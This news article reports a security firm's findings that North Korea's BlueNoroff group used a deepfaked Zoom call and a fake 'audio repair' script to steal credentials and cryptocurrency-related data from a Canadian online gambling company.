Lazarus returns
An Ottawa cyber security firm has revealed an unnamed Canadian online gambling company was recently targeted by a subsidiary of North Korea state-sponsored mega-hackers, the Lazarus Group.
According to security firm Field Effect, Lazarus sub-brand BlueNoroff used “social engineering tactics to take control of a victim’s computer and deploy infostealer malware” via a Zoom call.
Zoom audio repair tool Trojan Horse script
BlueNoroff allegedly used a fake domain to deceive the Ottawa gambling firm during a scheduled cryptocurrency-related Zoom meeting. The hacker convinced the victim because of audio issues to run a Zoom audio repair tool which was, in fact, a malicious Trojan Horse script.
Field Effect stated the hackers got away with “sensitive personal and system data, with a clear focus on cryptocurrency-related assets.”
Elaborate scam
A news release revealed that BlueNoroff duped an employee of the Canadian gambling firm by impersonating trusted contacts and setting up a website that faked a Zoom support page.
The hackers used deep-fake technology to establish trust as a business contact.
script masquerading as a Zoom audio repair tool
“During the call, the victim experienced audio issues and multiple pop-up warnings. The other participant then prompted the victim to run a script masquerading as a Zoom audio repair tool,” stated Field Effect.
Once downloaded, a second script kicked in, asking the Canadian employee for credentials. Field Effect said the hackers used the employee’s credentials in following commands while downloading and executing “an infostealer and a loader for a fully featured malware implant.”
The breach allowed BlueNoroff to extract sensitive information from the gambling firm, including “browser data and user keychain files.”
Bigger picture
The cyber security firm attributed the hack to a wider Zoom scam campaign that emerged in March primarily focused on crypto businesses.
“It exemplifies an evolving pattern in which financially motivated threat actors continue refining their tradecraft, embedding malicious activity within legitimate business workflows and exploiting user trust as the primary attack surface,” the security company stated.
